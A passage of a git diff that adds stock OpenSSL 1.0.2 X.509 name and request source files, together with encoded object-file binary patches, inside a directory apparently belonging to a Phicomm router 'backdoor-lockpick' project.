z@;hDZ#&G5*kM0K@e5el|=!4_w=#~+f9u?|z&H!Lf!@wSUWgLKBIPHTk0gn8fm!Flj
zKK}1Be_Tg#&JpNOVf4!TWgq+-z%g$JGz#bW0c^yBtoI!M3GiP0cl+SK^}!!7{w2om
zoI}7yVUBq}W4HpCBh53>c+u1?xkwhkR43;$DooWi-7r^bRidUdvlB{2ot>JRPvz8{
zGLcECM48XV)ah(4l}^o}y9><c=BBf0)mpFXYE{3|O}Jv34c$<yT19skvdT=#iS5c;
z)=Vp3zpPn$7w6?hy=%T~=!}LJT-BRAaF4KNSj1daO{S}j3QpIwa)U+BrQVpmkV-m_
zZ0KvXqGrKUCo#RlBCeadv7(i;jY>f``1YM+#vo`s%m3`Sa#g^wuN?nEz>f&{Z2=ek
z{}gc1Kf?NmdGX!K`J)2<xPVUx_!9!YF5qI`4+UJz`?Y|J{@VgB`k#PYC|Kt(3|?mq
zK@h|x7#t6Sje>tK;NY^r436{rT=wAn-d^+I{2t!$;QSum^WgmcgxGWOy!`$U*<7z!
zS^>0WxVpqGLoaKx1;>%daE>)17fh4L#agAJR{^WmEM10g<SEnAimPn?cC{hbjapqd
ztaTzg40=gjHt@Fm9})%<d=&4SJOLQWZT6h*%=P6q>QNZjs{{;DDEkClWbp@K5l#LD
z2r=j981DV@JR>%l`J(caLrwyQoc}dG#yF#(MdA7RIpu3SKi7EAxy^l0&pc%P=fM}Z
z%IkiS0by7Zh3_B73SeM<Z+x8r2~Tm}c>E6b>fbfy_&H02{X>Yy^Zxb9jUm@rLl#&a
oc*pTy25&rK-rfO30_;G>J@tF01m7vW;uA;=!rue#Y=5u*1yng3kN^Mx

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509name.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509name.c
new file mode 100644
index 0000000..6ea601f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509name.c
@@ -0,0 +1,397 @@
+/* crypto/x509/x509name.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/stack.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+
+int X509_NAME_get_text_by_NID(X509_NAME *name, int nid, char *buf, int len)
+{
+    ASN1_OBJECT *obj;
+
+    obj = OBJ_nid2obj(nid);
+    if (obj == NULL)
+        return (-1);
+    return (X509_NAME_get_text_by_OBJ(name, obj, buf, len));
+}
+
+int X509_NAME_get_text_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj, char *buf,
+                              int len)
+{
+    int i;
+    ASN1_STRING *data;
+
+    i = X509_NAME_get_index_by_OBJ(name, obj, -1);
+    if (i < 0)
+        return (-1);
+    data = X509_NAME_ENTRY_get_data(X509_NAME_get_entry(name, i));
+    i = (data->length > (len - 1)) ? (len - 1) : data->length;
+    if (buf == NULL)
+        return (data->length);
+    memcpy(buf, data->data, i);
+    buf[i] = '\0';
+    return (i);
+}
+
+int X509_NAME_entry_count(X509_NAME *name)
+{
+    if (name == NULL)
+        return (0);
+    return (sk_X509_NAME_ENTRY_num(name->entries));
+}
+
+int X509_NAME_get_index_by_NID(X509_NAME *name, int nid, int lastpos)
+{
+    ASN1_OBJECT *obj;
+
+    obj = OBJ_nid2obj(nid);
+    if (obj == NULL)
+        return (-2);
+    return (X509_NAME_get_index_by_OBJ(name, obj, lastpos));
+}
+
+/* NOTE: you should be passsing -1, not 0 as lastpos */
+int X509_NAME_get_index_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj, int lastpos)
+{
+    int n;
+    X509_NAME_ENTRY *ne;
+    STACK_OF(X509_NAME_ENTRY) *sk;
+
+    if (name == NULL)
+        return (-1);
+    if (lastpos < 0)
+        lastpos = -1;
+    sk = name->entries;
+    n = sk_X509_NAME_ENTRY_num(sk);
+    for (lastpos++; lastpos < n; lastpos++) {
+        ne = sk_X509_NAME_ENTRY_value(sk, lastpos);
+        if (OBJ_cmp(ne->object, obj) == 0)
+            return (lastpos);
+    }
+    return (-1);
+}
+
+X509_NAME_ENTRY *X509_NAME_get_entry(X509_NAME *name, int loc)
+{
+    if (name == NULL || sk_X509_NAME_ENTRY_num(name->entries) <= loc
+        || loc < 0)
+        return (NULL);
+    else
+        return (sk_X509_NAME_ENTRY_value(name->entries, loc));
+}
+
+X509_NAME_ENTRY *X509_NAME_delete_entry(X509_NAME *name, int loc)
+{
+    X509_NAME_ENTRY *ret;
+    int i, n, set_prev, set_next;
+    STACK_OF(X509_NAME_ENTRY) *sk;
+
+    if (name == NULL || sk_X509_NAME_ENTRY_num(name->entries) <= loc
+        || loc < 0)
+        return (NULL);
+    sk = name->entries;
+    ret = sk_X509_NAME_ENTRY_delete(sk, loc);
+    n = sk_X509_NAME_ENTRY_num(sk);
+    name->modified = 1;
+    if (loc == n)
+        return (ret);
+
+    /* else we need to fixup the set field */
+    if (loc != 0)
+        set_prev = (sk_X509_NAME_ENTRY_value(sk, loc - 1))->set;
+    else
+        set_prev = ret->set - 1;
+    set_next = sk_X509_NAME_ENTRY_value(sk, loc)->set;
+
+    /*-
+     * set_prev is the previous set
+     * set is the current set
+     * set_next is the following
+     * prev  1 1    1 1     1 1     1 1
+     * set   1      1       2       2
+     * next  1 1    2 2     2 2     3 2
+     * so basically only if prev and next differ by 2, then
+     * re-number down by 1
+     */
+    if (set_prev + 1 < set_next)
+        for (i = loc; i < n; i++)
+            sk_X509_NAME_ENTRY_value(sk, i)->set--;
+    return (ret);
+}
+
+int X509_NAME_add_entry_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj, int type,
+                               unsigned char *bytes, int len, int loc,
+                               int set)
+{
+    X509_NAME_ENTRY *ne;
+    int ret;
+    ne = X509_NAME_ENTRY_create_by_OBJ(NULL, obj, type, bytes, len);
+    if (!ne)
+        return 0;
+    ret = X509_NAME_add_entry(name, ne, loc, set);
+    X509_NAME_ENTRY_free(ne);
+    return ret;
+}
+
+int X509_NAME_add_entry_by_NID(X509_NAME *name, int nid, int type,
+                               unsigned char *bytes, int len, int loc,
+                               int set)
+{
+    X509_NAME_ENTRY *ne;
+    int ret;
+    ne = X509_NAME_ENTRY_create_by_NID(NULL, nid, type, bytes, len);
+    if (!ne)
+        return 0;
+    ret = X509_NAME_add_entry(name, ne, loc, set);
+    X509_NAME_ENTRY_free(ne);
+    return ret;
+}
+
+int X509_NAME_add_entry_by_txt(X509_NAME *name, const char *field, int type,
+                               const unsigned char *bytes, int len, int loc,
+                               int set)
+{
+    X509_NAME_ENTRY *ne;
+    int ret;
+    ne = X509_NAME_ENTRY_create_by_txt(NULL, field, type, bytes, len);
+    if (!ne)
+        return 0;
+    ret = X509_NAME_add_entry(name, ne, loc, set);
+    X509_NAME_ENTRY_free(ne);
+    return ret;
+}
+
+/*
+ * if set is -1, append to previous set, 0 'a new one', and 1, prepend to the
+ * guy we are about to stomp on.
+ */
+int X509_NAME_add_entry(X509_NAME *name, X509_NAME_ENTRY *ne, int loc,
+                        int set)
+{
+    X509_NAME_ENTRY *new_name = NULL;
+    int n, i, inc;
+    STACK_OF(X509_NAME_ENTRY) *sk;
+
+    if (name == NULL)
+        return (0);
+    sk = name->entries;
+    n = sk_X509_NAME_ENTRY_num(sk);
+    if (loc > n)
+        loc = n;
+    else if (loc < 0)
+        loc = n;
+
+    name->modified = 1;
+
+    if (set == -1) {
+        if (loc == 0) {
+            set = 0;
+            inc = 1;
+        } else {
+            set = sk_X509_NAME_ENTRY_value(sk, loc - 1)->set;
+            inc = 0;
+        }
+    } else {                    /* if (set >= 0) */
+
+        if (loc >= n) {
+            if (loc != 0)
+                set = sk_X509_NAME_ENTRY_value(sk, loc - 1)->set + 1;
+            else
+                set = 0;
+        } else
+            set = sk_X509_NAME_ENTRY_value(sk, loc)->set;
+        inc = (set == 0) ? 1 : 0;
+    }
+
+    if ((new_name = X509_NAME_ENTRY_dup(ne)) == NULL)
+        goto err;
+    new_name->set = set;
+    if (!sk_X509_NAME_ENTRY_insert(sk, new_name, loc)) {
+        X509err(X509_F_X509_NAME_ADD_ENTRY, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    if (inc) {
+        n = sk_X509_NAME_ENTRY_num(sk);
+        for (i = loc + 1; i < n; i++)
+            sk_X509_NAME_ENTRY_value(sk, i - 1)->set += 1;
+    }
+    return (1);
+ err:
+    if (new_name != NULL)
+        X509_NAME_ENTRY_free(new_name);
+    return (0);
+}
+
+X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_txt(X509_NAME_ENTRY **ne,
+                                               const char *field, int type,
+                                               const unsigned char *bytes,
+                                               int len)
+{
+    ASN1_OBJECT *obj;
+    X509_NAME_ENTRY *nentry;
+
+    obj = OBJ_txt2obj(field, 0);
+    if (obj == NULL) {
+        X509err(X509_F_X509_NAME_ENTRY_CREATE_BY_TXT,
+                X509_R_INVALID_FIELD_NAME);
+        ERR_add_error_data(2, "name=", field);
+        return (NULL);
+    }
+    nentry = X509_NAME_ENTRY_create_by_OBJ(ne, obj, type, bytes, len);
+    ASN1_OBJECT_free(obj);
+    return nentry;
+}
+
+X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_NID(X509_NAME_ENTRY **ne, int nid,
+                                               int type, unsigned char *bytes,
+                                               int len)
+{
+    ASN1_OBJECT *obj;
+    X509_NAME_ENTRY *nentry;
+
+    obj = OBJ_nid2obj(nid);
+    if (obj == NULL) {
+        X509err(X509_F_X509_NAME_ENTRY_CREATE_BY_NID, X509_R_UNKNOWN_NID);
+        return (NULL);
+    }
+    nentry = X509_NAME_ENTRY_create_by_OBJ(ne, obj, type, bytes, len);
+    ASN1_OBJECT_free(obj);
+    return nentry;
+}
+
+X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_OBJ(X509_NAME_ENTRY **ne,
+                                               ASN1_OBJECT *obj, int type,
+                                               const unsigned char *bytes,
+                                               int len)
+{
+    X509_NAME_ENTRY *ret;
+
+    if ((ne == NULL) || (*ne == NULL)) {
+        if ((ret = X509_NAME_ENTRY_new()) == NULL)
+            return (NULL);
+    } else
+        ret = *ne;
+
+    if (!X509_NAME_ENTRY_set_object(ret, obj))
+        goto err;
+    if (!X509_NAME_ENTRY_set_data(ret, type, bytes, len))
+        goto err;
+
+    if ((ne != NULL) && (*ne == NULL))
+        *ne = ret;
+    return (ret);
+ err:
+    if ((ne == NULL) || (ret != *ne))
+        X509_NAME_ENTRY_free(ret);
+    return (NULL);
+}
+
+int X509_NAME_ENTRY_set_object(X509_NAME_ENTRY *ne, ASN1_OBJECT *obj)
+{
+    if ((ne == NULL) || (obj == NULL)) {
+        X509err(X509_F_X509_NAME_ENTRY_SET_OBJECT,
+                ERR_R_PASSED_NULL_PARAMETER);
+        return (0);
+    }
+    ASN1_OBJECT_free(ne->object);
+    ne->object = OBJ_dup(obj);
+    return ((ne->object == NULL) ? 0 : 1);
+}
+
+int X509_NAME_ENTRY_set_data(X509_NAME_ENTRY *ne, int type,
+                             const unsigned char *bytes, int len)
+{
+    int i;
+
+    if ((ne == NULL) || ((bytes == NULL) && (len != 0)))
+        return (0);
+    if ((type > 0) && (type & MBSTRING_FLAG))
+        return ASN1_STRING_set_by_NID(&ne->value, bytes,
+                                      len, type,
+                                      OBJ_obj2nid(ne->object)) ? 1 : 0;
+    if (len < 0)
+        len = strlen((const char *)bytes);
+    i = ASN1_STRING_set(ne->value, bytes, len);
+    if (!i)
+        return (0);
+    if (type != V_ASN1_UNDEF) {
+        if (type == V_ASN1_APP_CHOOSE)
+            ne->value->type = ASN1_PRINTABLE_type(bytes, len);
+        else
+            ne->value->type = type;
+    }
+    return (1);
+}
+
+ASN1_OBJECT *X509_NAME_ENTRY_get_object(X509_NAME_ENTRY *ne)
+{
+    if (ne == NULL)
+        return (NULL);
+    return (ne->object);
+}
+
+ASN1_STRING *X509_NAME_ENTRY_get_data(X509_NAME_ENTRY *ne)
+{
+    if (ne == NULL)
+        return (NULL);
+    return (ne->value);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509name.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509name.o
new file mode 100644
index 0000000000000000000000000000000000000000..7bb89158c6367a9b38c89be56140ee01419f2bda
GIT binary patch
literal 7568
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509rset.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509rset.c
new file mode 100644
index 0000000..80e273e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509rset.c
@@ -0,0 +1,85 @@
+/* crypto/x509/x509rset.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+
+int X509_REQ_set_version(X509_REQ *x, long version)
+{
+    if (x == NULL)
+        return (0);
+    return (ASN1_INTEGER_set(x->req_info->version, version));
+}
+
+int X509_REQ_set_subject_name(X509_REQ *x, X509_NAME *name)
+{
+    if ((x == NULL) || (x->req_info == NULL))
+        return (0);
+    return (X509_NAME_set(&x->req_info->subject, name));
+}
+
+int X509_REQ_set_pubkey(X509_REQ *x, EVP_PKEY *pkey)
+{
+    if ((x == NULL) || (x->req_info == NULL))
+        return (0);
+    return (X509_PUBKEY_set(&x->req_info->pubkey, pkey));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509rset.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509rset.o
new file mode 100644
index 0000000000000000000000000000000000000000..2f18a60bc0528a02973471a8535e6fd4bc049606
GIT binary patch
literal 1936
zcmb`H&u<b@5XXm7rB#}?#zT{;!HcQUzJRu=?LmRMfEFoINb13CSX`~PEM$Ke@SrB@
ziHk8F{8PM`ka+Ol=+&d~W=wEq_YGaPiwEO3dCbh`&Aj(^b|0^lVs0W50agTV!coK&
zpgeixr(HJ<GZ2TLvlo69-VN+{p%*LkIt$-vF4h0ae7?}TMf1~zH{TL}n_S{a$Zu|L
zB$jHLW7tk&U0fH*<<y$vhN+j=k|Mcs*~7FI9cvE92^{%S4JH8k#G*JzXFUUv7Zr$f
z<|2#n*wlM`K&m+>=N6<TmX!W^X{r8pfXOh_Q12$;#~^Gn8roSpE1!0>D(XJnD5EF}
zCyzsy$HwrfF`T+KsyK#ceCOoeTtrU&32F^N7%w2Fb-14Usg22R%luWeB+h?}e%SiZ
zSxv5+mTrp%?4qkyl=~`%>T}(+p0*57^Tq9Krl@Y`ayv>@t!A=CMTN{xDW%>iRh7I_
zq4d#O%h8_c4O=zpP2HO*W$r1*^V*KKuXnwSaxJ^1JaBX9-1GE<qHpjtj^6`Mf*^|c
z3=Za71X09iaWGGyPr~on9d3X>E7D=k{iS}Bm~$UNSly;w*U;LgXZP4M^@F;w^^OhV
zQQfYC&@2l?qt$Hc1~Q{%>jLl8vSrsB`!arFIHGN~+PZ0XLAWdEd+KA8I`%)5z(wc|
z1;6k#GE&7e!(YnvYY_wLW!ewXFUu>&eL97VYWZexA1_HBypbP}hbg%KRZOBa|Fu4a
zwX|juhhMz^6+c9u_h-A|WB$}H{=nyR9izMG(7y<MM}GBXknltFxqpl`bZE_B{h>_Q
zm6lDg{vl3;y}wT(?~iJ^p5I^C-n7>Z`Jk_*rMo#DQco=S?hwIe`9L2j@JTK=By|77
O>JKG67-o7-u>KFB(6pxj

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509spki.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509spki.c
new file mode 100644
index 0000000..2df84ea
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509spki.c
@@ -0,0 +1,123 @@
+/* x509spki.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
